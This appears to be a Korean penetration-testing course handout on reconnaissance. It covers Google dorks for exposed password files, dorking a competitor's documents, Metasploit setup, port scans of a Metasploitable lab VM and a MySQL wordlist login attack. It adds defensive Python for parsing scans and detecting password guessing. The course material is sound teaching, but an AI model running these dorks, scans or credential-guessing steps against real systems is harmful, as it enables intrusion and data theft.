20160525 Information Gathering Phase
==================================================Memo==================================================
nmap : scanner
nessus : vulnerability scanner
http://whatis.techtarget.com/file-extension-list/A
Fix for the usual case where an update or upgrade was accidentally interrupted partway:
$ sudo apt-get autoremove
$ sudo apt-get autoclean
$ sudo apt-get clean
It is also good to run these after removing a program.
bind_tcp : the target has a public IP; the payload listens on the target (the notes' mnemonic: a "stake")
reverse_tcp : the target has a private IP; the target connects back to us (the notes' mnemonic: "bait")
================================================Lecture/Practice================================================
Googling, Google hacking, Google hacks
■ GHDB (Google Hack DB)
A service that organizes into a database the ways to find or obtain specific or sensitive material through Google searches, and the ways to find hacking vulnerabilities.
http://www.exploit-db.com/google-dorks
■ GHDB Categories
Category (count) : Description
Footholds (31) : Examples of queries that can help a hacker gain a foothold into a web server
Files containing usernames (17) : These files contain usernames, but no passwords... Still, google finding usernames on a web site..
Sensitive Directories (74) : Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sensitive to uber-secret!
Web Server Detection (72) : These links demonstrate Google's awesome ability to profile web servers..
Vulnerable Files (61) : HUNDREDS of vulnerable files that Google can find on websites...
Vulnerable Servers (77) : These searches reveal servers with specific vulnerabilities. These are found in a different way than the searches found in the "Vulnerable Files" section.
Error Messages (77) : Really retarded error messages that say WAY too much!
Files containing juicy info (77) : No usernames or passwords, but interesting stuff none the less.
Files containing passwords (305) : PASSWORDS, for the LOVE OF GOD!!! Google found PASSWORDS!
Sensitive Online Shopping Info (9) : Examples of queries that can reveal online shopping info like customer data, suppliers, orders, creditcard numbers, credit card info, etc
Network or vulnerability data (63) : These pages contain such things as firewall logs, honeypot logs, network information, IDS logs... all sorts of fun stuff!
Pages containing login portals (284) : These are login pages for various services. Consider them the front door of a website's more sensitive functions.
Various Online Devices (242) : This category contains things like printers, video cameras, and all sorts of cool things found on the web with Google.
Advisories and Vulnerabilities (1971) : These searches locate vulnerable servers. These searches are often generated from various security advisory posts, and in many cases are product or version-specific.
[Practice] Search the various information in the GHDB and summarize the search patterns.
- Refer to the following document.
- "Hacking Defense Using Google Search" (구글검색을이용한해킹방어) [심정재]
Basic search methods (http://www.google.co.kr)
● virtualization (가상화)
● virtualization .ppt
● virtualization .pdf
● site:.redhat.com error message
● "server error"
● virtualization AND centos
Advanced search methods (http://www.google.co.kr)
● intitle:
● site:
● inurl:
● filetype:
● intext:
[Summary] How to use Google keywords (time: 15 minutes)
- Summarize the useful search terms on the www.exploit-db.com/google-dorks site
- Summarize the search terms in the "Hacking Defense Using Google Search" [심정재] document
[Practice] Compare the results of an entry selected on the Google Dorks site with the same query typed directly into the Google website
- http://www.exploit-db.com/google-dorks
● intitle
● inurl
● site
● filetype
● intext
[Practice] Use the "Google Webmaster Tools > Remove Content" request service
- https://www.google.com/webmasters/tools/removals?hl=ko
- (Scenario) Search for your own information and submit a request using the removal service.
-> (Note) Read the contents of the web page carefully.
[Practice] Build a hypothetical scenario and run various tests.
(Note) Be sure to document the search process as you go.
(Example 1) Searching for vulnerable files
passwd
passwd.txt
shadow
shadow.txt
admin.txt
etc.
(Example 2)
www.exploit-db.com/google-dorks
-> In the 'category' section at the bottom, select 'Files containing passwords' and
enter 'admin' in the search field.
(Hypothetical scenario 1)
Let's obtain information about a company competing with ours.
● site:example.com filetype:hwp  proposal files submitted to government agencies
● site:example.com filetype:pdf  presentation materials
● site:example.com filetype:ppt  presentation materials
● site:example.com filetype:xls  management/administrative spreadsheets
Let's summarize the file types.
[Reference] File extension types (http://www.terms.co.kr/filename-extensions.htm)
Extension : Description
hwp : Hangul (Haansoft) word processor file
pdf : Adobe Acrobat document format (Portable Document Format)
xls : Microsoft Excel file
ppt : Microsoft PowerPoint file
(Hypothetical scenario 2)
Check which sites are using your resident registration number
site:example.com intext:581010-XXXXXXX
C:\Users\soldeskN\Desktop\JS\Security과정공유디렉토리(part1)\04_과정진행\02_2.1_모의해킹_침해대응_개요\02_정보수집단계\04_Metaspolit_Kali2.0.hwp
Metasploit
1. Metasploit (MSF: Metasploit Framework)
● An integrated vulnerability assessment framework
● MSF (Metasploit Framework) is an open-source tool: a framework that provides exploit code, payloads, encoders, reconnaissance tools, security testing and more.
● (Early versions) a simple collection of exploit code; (current version) provides the ability to design and develop security tools for a wide range of information gathering, attack and pre-intrusion tasks
● MSF is the first and best foundation program providing an environment in which new exploit code, payloads and reconnaissance tools can be developed.
● MSF provides a base on which tools and related utilities that enable the development of new security-testing techniques and security research can be designed directly.
● Supports Unix, Linux, Windows and Mac environments.
● Metasploit is offered as a Pro version (paid, free for 7 days) and a Community version (free).
● Kali Linux ships with the Community version.
2. Accessing the Community edition web service on Kali Linux
Databases (DB) : Oracle (Oracle 12c), IBM (DB2), Microsoft (MS-SQL), MySQL, PostgreSQL
(KaliLinux)
# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
# service metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
Configuring Metasploit...
Creating metasploit database user 'msf3'...
Creating metasploit database 'msf3'...
insserv: warning: current start runlevel(s) (empty) of script `metasploit' overrides LSB defaults (2 3 4 5).
insserv: warning: current stop runlevel(s) (0 1 2 3 4 5 6) of script `metasploit' overrides LSB defaults (0 1 6).
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
# firefox http://localhost:3790
Enter the user creation details
Username: <anything> (e.g. administrator)
Password: soldesk1.
Enter the Activation Code
3. Metasploit components
MSFpayload
MSFencode
Auxiliary
■ MSFpayload
● Helps build the executables, shellcode and so on used by the framework's many exploits.
● Shellcode can be generated in C, Ruby, JavaScript, Visual Basic and other formats.
(e.g.) If a Python-based program needs to be verified, the C-style output works well.
(e.g.) To build a browser exploit, the JavaScript format works well.
● For help with the command, run # msfpayload -h
● Alternatively, to see a module's options in detail (as with the msfcli command), put 'O' (the letter O, for Options) at the end of the command: # msfpayload windows/shell_reverse_tcp O
■ MSFencode
● The Metasploit developers made it possible, through encoding, to evade antivirus, IDS and the like and to avoid bad characters. (e.g.) cleartext : text that needs no explanation when displayed, i.e. unencrypted plaintext
● For help with the command: # msfencode -h
■ Auxiliary (helper/support modules)
● A collection of supporting modules alongside the exploits (strictly speaking, auxiliary modules contain no exploits).
● They are divided into roughly 18 categories.
# cd /usr/share/metasploit-framework/modules/auxiliary
# ls
admin bnat crawler dos gather pdf server spoof voip
analyze client docx fuzzers parser scanner sniffer sqli vsploit
# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > show auxiliary
Auxiliary
=========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability
admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry normal Veritas Backup Exec Server Registry Access
admin/cisco/cisco_secure_acs_bypass normal Cisco Secure ACS Unauthorized Password Change
..... (omitted) .....
msf > quit
[Practice] Using Kali Linux 1
● Load the port-scan information from zenmap into Metasploit
(Checking the Metasploitable V2 Linux information)
Login ID/PASS: msfadmin/msfadmin
$ ifconfig
$ netstat -nr
$ cat /etc/resolv.conf
$ uname -a
$ cat /etc/lsb-release (# ls /etc/*release)
VMware > Edit > Virtual Network Editor > VMnet8(NAT) > [ V ] Use local DHCP service to distribute IP address to VMs
Metasploitable Linux network information (Note) eth0 must be switched to NAT (Host only -> NAT)
IP: 192.168.10.134/24  default router: 192.168.10.2  DNS Server : 192.168.10.2
[Reference] Metasploitable V2 server network settings
① Port-scan the target system with the nmap program and save the results to a file.
(Kali Linux)
# zenmap &
-> Select 'Quick scan plus'
-> IP : 192.168.10.134 /* Metasploitable V2 Linux's IP : 192.168.10.134 */
-> Save the scan results to a file: /root/scan1.xml
Scan > Save Scan
-> Once the scan has finished, close zenmap.
② Initialize the DB (e.g. msf)
# msfdb
Manage a metasploit framework database
msfdb init # initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
# msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
# cat /usr/share/metasploit-framework/config/database.yml
development:
adapter: postgresql
database: msf
username: msf
password: Yb/xisj5lfc22lmvFXawKj70B5RaY3/ubSZN5HbB2Qk=
host: localhost
port: 5432
pool: 5
timeout: 5
production:
adapter: postgresql
database: msf
username: msf
password: Yb/xisj5lfc22lmvFXawKj70B5RaY3/ubSZN5HbB2Qk=
host: localhost
port: 5432
pool: 5
timeout: 5
test:
adapter: postgresql
database: msf_test
username: msf
password: Yb/xisj5lfc22lmvFXawKj70B5RaY3/ubSZN5HbB2Qk=
host: localhost
port: 5432
pool: 5
timeout: 5
[Reference] Run the following commands if needed
# service postgresql status
# service postgresql start
# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015102101 ]
+ -- --=[ 1496 exploits - 862 auxiliary - 251 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > db_status
[*] postgresql connected to msf
msf >
③ Open the MSF console on Kali Linux and import the previously saved file (e.g. scan1.xml).
msf > help
Core Commands
=============
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
go_pro Launch Metasploit web GUI
grep Grep the output of another command
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================
Command Description
------- -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
msf > db_import /root/scan1.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.6.1'
[*] Importing host 192.168.20.200
[*] Successfully imported /root/scan1.xml
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.20.200 00:0C:29:D1:CC:21 Linux CentOS server
msf > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.20.200 21 tcp ftp open vsftpd 2.0.5
192.168.20.200 22 tcp ssh open OpenSSH 4.3 protocol 2.0
192.168.20.200 23 tcp telnet open BSD-derived telnetd
192.168.20.200 25 tcp smtp open Sendmail 8.13.8/8.13.8
192.168.20.200 53 tcp domain open ISC BIND 9.3.6-20.P1.el5_8.6
192.168.20.200 80 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 110 tcp pop3 open Dovecot pop3d
192.168.20.200 111 tcp rpcbind open 2 RPC #100000
192.168.20.200 143 tcp imap open Dovecot imapd
192.168.20.200 443 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 993 tcp imap open Dovecot imapd
192.168.20.200 995 tcp pop3 open Dovecot pop3d
msf > notes
[*] Time: 2014-07-17 09:18:44 UTC Note: host=192.168.20.200 type=host.imported
data={:filename=>"/root/scan1.xml", :type=>"Nmap XML", :time=>2014-07-17 09:18:44 UTC}
[*] Time: 2014-07-17 09:18:45 UTC Note: host=192.168.20.200 type=host.os.nmap_fingerprint
data={:os_vendor=>"Linux", :os_family=>"Linux", :os_version=>"2.6.X", :os_accuracy=>100}
[*] Time: 2014-07-17 09:18:45 UTC Note: host=192.168.20.200 type=host.last_boot
data={:time=>"Thu Jul 17 15:44:09 2014"}
msf > search portscan /* types of supported scan methods */
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set PORTS 1-500
PORTS => 1-500
msf auxiliary(syn) > set RHOSTS 192.168.10.134 /* Metasploitable V2 IP's 192.168.10.134 */
RHOSTS => 192.168.10.134
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.10.134:21
[*] TCP OPEN 192.168.10.134:22
[*] TCP OPEN 192.168.10.134:23
[*] TCP OPEN 192.168.10.134:25
[*] TCP OPEN 192.168.10.134:53
[*] TCP OPEN 192.168.10.134:80
[*] TCP OPEN 192.168.10.134:111
[*] TCP OPEN 192.168.10.134:139
[*] TCP OPEN 192.168.10.134:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) > quit
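The zenmap -> db_import -> hosts/services flow above, as an added Python example that is not part of the course notes: it parses the Nmap XML that zenmap saves (the same file db_import reads), builds the rows msfconsole prints for `hosts` and `services`, and, going one step beyond the notes, diffs two scans of the same host to show which open services appeared or disappeared. The XML fixtures are constructed and trimmed to the attributes the parser uses.

```python
"""Parse Nmap XML (the file zenmap saves and msf db_import reads) and diff two scans."""
import xml.etree.ElementTree as ET


def make_nmap_xml(addr, mac, ports):
    """Constructed fixture builder: a minimal nmaprun document for one host.
    ports = [(port, proto, state, name, product, version)]; real files carry more attributes."""
    port_xml = "".join(
        f'<port protocol="{proto}" portid="{port}"><state state="{state}" reason="syn-ack"/>'
        f'<service name="{name}" product="{product}" version="{version}" method="probed" conf="10"/></port>'
        for port, proto, state, name, product, version in ports
    )
    return (
        '<?xml version="1.0"?><nmaprun scanner="nmap" version="6.46">'
        '<host><status state="up" reason="arp-response"/>'
        f'<address addr="{addr}" addrtype="ipv4"/><address addr="{mac}" addrtype="mac" vendor="VMware"/>'
        f'<ports>{port_xml}</ports>'
        '<os><osmatch name="Linux 2.6.X" accuracy="100">'
        '<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="100"/>'
        '</osmatch></os></host></nmaprun>'
    )


# Constructed sample scans of the host shown in the db_import session (not real scan files).
BASELINE_XML = make_nmap_xml("192.168.20.200", "00:0C:29:D1:CC:21", [
    (21, "tcp", "open", "ftp", "vsftpd", "2.0.5"),
    (22, "tcp", "open", "ssh", "OpenSSH", "4.3"),
    (80, "tcp", "open", "http", "Apache httpd", "2.2.3"),
])
# The same host rescanned later: telnet has appeared and ftp has been closed.
CURRENT_XML = make_nmap_xml("192.168.20.200", "00:0C:29:D1:CC:21", [
    (21, "tcp", "closed", "ftp", "", ""),
    (22, "tcp", "open", "ssh", "OpenSSH", "4.3"),
    (23, "tcp", "open", "telnet", "BSD-derived telnetd", ""),
    (80, "tcp", "open", "http", "Apache httpd", "2.2.3"),
])


def parse_nmap_xml(xml_text):
    """Return {addr: {"mac": ..., "os": ..., "services": {(port, proto): {"name", "info"}}}}
    for hosts that are up, keeping only open ports, as db_import does."""
    hosts = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = mac = None
        for a in host.findall("address"):
            if a.get("addrtype") == "ipv4":
                addr = a.get("addr")
            elif a.get("addrtype") == "mac":
                mac = a.get("addr")
        if addr is None:
            continue
        osclass = host.find("os/osmatch/osclass")
        services = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            # msf's "info" column is product + version, e.g. "vsftpd 2.0.5"
            info = " ".join(v for v in (svc.get("product", ""), svc.get("version", "")) if v) if svc is not None else ""
            services[(int(port.get("portid")), port.get("protocol"))] = {"name": name, "info": info}
        os_name = osclass.get("osfamily", "") if osclass is not None else ""
        hosts[addr] = {"mac": mac, "os": os_name, "services": services}
    return hosts


def services_table(hosts):
    """Rows with the columns of the msfconsole `services` listing: host, port, proto, name, state, info."""
    return [(addr, port, proto, svc["name"], "open", svc["info"])
            for addr in sorted(hosts)
            for (port, proto), svc in sorted(hosts[addr]["services"].items())]


def service_changes(baseline, current):
    """Defender's use of two imported scans: which open services appeared or disappeared on each host."""
    changes = []
    for addr in sorted(set(baseline) | set(current)):
        old = baseline.get(addr, {}).get("services", {})
        new = current.get(addr, {}).get("services", {})
        for port, proto in sorted(set(new) - set(old)):
            changes.append(("added", addr, port, proto, new[(port, proto)]["name"]))
        for port, proto in sorted(set(old) - set(new)):
            changes.append(("removed", addr, port, proto, old[(port, proto)]["name"]))
    return changes


if __name__ == "__main__":
    base, cur = parse_nmap_xml(BASELINE_XML), parse_nmap_xml(CURRENT_XML)
    for row in services_table(base):
        print("%-16s %5d %-4s %-8s %-5s %s" % row)
    for change in service_changes(base, cur):
        print(change)
```

Point `parse_nmap_xml` at the contents of /root/scan1.xml to reproduce the `services` listing locally; keeping the previous XML around and running `service_changes` is the cheapest way to notice a newly exposed port between scans.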
[Practice] Using Kali Linux 2
● Let's scan for vulnerabilities using Metasploit
● (Prerequisites) Metasploitable V2 powered ON
- VMware > Edit > Virtual Network Editor > VMnet8(NAT) > [ V ] Use local DHCP service to distribute IP address to VMs
- Metasploitable Linux network information (Note) eth0 must be switched to NAT (Host only -> NAT) IP: 192.168.10.134/255.255.255.0  default router: 192.168.10.2  DNS Server : 192.168.10.2
(KaliLinux)
# nmap -sV 192.168.10.134
Starting Nmap 6.46 ( http://nmap.org ) at 2015-02-27 16:04 KST
Nmap scan report for 192.168.10.134
Host is up (0.00023s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds
# msfconsole
msf > search mysql_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in
the current database
DB_ALL_PASS false no Add all passwords in the current database
to the list
DB_ALL_USERS false no Add all users in the current database to
the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR
identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for
a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords
separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all
users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(mysql_login) > set RHOSTS 192.168.10.134
RHOSTS => 192.168.10.134
msf auxiliary(mysql_login) > run
[*] 192.168.10.134:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[TERM2] In another window, create the user.txt and pass.txt files
# cd /usr/share/metasploit-framework/data/wordlists
# vi user.txt
root
admin
administrator
# echo "" > pass.txt
#
-> On Metasploitable V2 the root user has no password.
msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt
msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt
msf auxiliary(mysql_login) > run
[*] 192.168.10.134:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 192.168.10.134:3306 MYSQL - [1/3] - Trying username:'root' with password:''
[+] 192.168.10.134:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] 192.168.10.134:3306 MYSQL - [2/3] - Trying username:'admin' with password:''
[-] Access denied
[*] 192.168.10.134:3306 MYSQL - [3/3] - Trying username:'administrator' with password:''
[-] Access denied
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) > quit
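As an added defender-side example (not part of the course notes), a Python check for the two findings of the mysql_login run above: the burst of refused connections a wordlist run leaves in the server's log, and the empty root password it succeeded with. The log lines are constructed in the style mysqld writes with log_warnings=2 (the exact format and the mysql.user rows are assumptions); an empty PASS_FILE entry shows up as "using password: NO".

```python
"""Spot MySQL credential guessing (what mysql_login looks like server-side) and empty-password accounts."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not a real capture): MySQL error-log lines in the style mysqld writes
# with log_warnings=2 when a connection is refused. A burst of guesses from the Kali host,
# then a lone failure from an application server. Timestamp layout "yymmdd hh:mm:ss" is assumed.
SAMPLE_LOG = """\
140717 21:58:01 [Warning] Access denied for user 'admin'@'192.168.10.130' (using password: NO)
140717 21:58:01 [Warning] Access denied for user 'administrator'@'192.168.10.130' (using password: NO)
140717 21:58:02 [Warning] Access denied for user 'root'@'192.168.10.130' (using password: YES)
140717 21:58:02 [Warning] Access denied for user 'admin'@'192.168.10.130' (using password: YES)
140717 21:58:03 [Warning] Access denied for user 'test'@'192.168.10.130' (using password: YES)
140717 22:10:44 [Warning] Access denied for user 'app'@'192.168.10.50' (using password: YES)
"""

# Constructed rows as SELECT user, host, password FROM mysql.user would return them (hashes replaced).
SAMPLE_USER_ROWS = [
    ("root", "localhost", ""),
    ("root", "%", ""),
    ("debian-sys-maint", "localhost", "*HASH-PLACEHOLDER"),
    ("msfadmin", "localhost", "*HASH-PLACEHOLDER"),
]

DENIAL_RE = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d{2}:\d{2}) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)' \(using password: (?P<pw>YES|NO)\)"
)


def parse_denials(log_text):
    """Return (timestamp, source host, username, password_supplied) for each denied connection."""
    events = []
    for line in log_text.splitlines():
        m = DENIAL_RE.match(line)
        if not m:
            continue  # other log lines (startup notes, table errors) are not interesting here
        ts = datetime.strptime(" ".join(m["ts"].split()), "%y%m%d %H:%M:%S")
        events.append((ts, m["host"], m["user"], m["pw"] == "YES"))
    return events


def detect_password_guessing(log_text, window_seconds=60, threshold=3):
    """Flag a source host when any window_seconds span holds >= threshold denials.
    A wordlist run (USER_FILE x PASS_FILE) produces this burst; a mistyped password does not."""
    by_source = defaultdict(list)
    for ts, host, user, _ in parse_denials(log_text):
        by_source[host].append((ts, user))
    alerts = []
    window = timedelta(seconds=window_seconds)
    for host, events in by_source.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward until it spans <= window_seconds
            if end - start + 1 >= threshold:
                alerts.append({
                    "source": host,
                    "failures": len(events),
                    "users": sorted({u for _, u in events}),
                    "first": events[0][0],
                    "last": events[-1][0],
                })
                break  # one alert per source host
    return alerts


def empty_password_accounts(user_rows):
    """(user, host) pairs that can log in with no password at all, like root on Metasploitable V2."""
    return [(user, host) for user, host, password in user_rows if password == ""]


if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_LOG):
        print("guessing from %(source)s: %(failures)d denials, users %(users)s" % alert)
    print("accounts with empty password:", empty_password_accounts(SAMPLE_USER_ROWS))
```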
[Practice] Using Kali Linux 2 (continued)
● Let's scan for vulnerabilities using Metasploit.
① Check the list of open ports on the server side (Metasploitable V2)
# nmap -sV -p 1-65535 192.168.10.134
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-17 21:06 KST
Nmap scan report for 192.168.10.134
Host is up (0.00024s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42043/tcp open mountd 1-3 (RPC #100005)
48481/tcp open unknown
50478/tcp open status 1 (RPC #100024)
56189/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.23 seconds
-> This takes a little while
# man nmap
-sV: Probe open ports to determine service/version info
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
② Test with powerfuzzer
